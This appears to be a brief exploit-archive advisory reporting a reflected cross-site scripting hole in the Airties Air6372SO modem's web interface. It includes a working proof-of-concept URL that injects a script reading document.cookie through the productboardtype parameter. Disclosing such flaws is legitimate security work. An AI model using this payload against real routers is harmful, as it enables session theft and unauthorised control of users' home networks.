Airties Air6372SO Modem Web Interface XSS/Iframe Injection Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://cyber-warrior.Org - http://h4x0resec.blogspot.com
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x, Unuttuklarımız affola..
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                    
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : Airties
|~Affected Version : Air6372SO
|~Official Web: http://www.airties.com
|~RISK : Light
|~Tested On : Kali Linux \ Windows XP \ Windows Vista \ Airties Air6372SO Modem Web Interface
####################INFO################################
interface can be easily operated without root login.

Exploitation;
==============================================================================
 http://$MODEMROOT/top.html?productboardtype=   ?

 http://192.168.2.1/top.html?productboardtype=<b>H4x0reSec</b> <script>alert(document.cookie)</script>
==============================================================================

                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                         _____________________________  
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/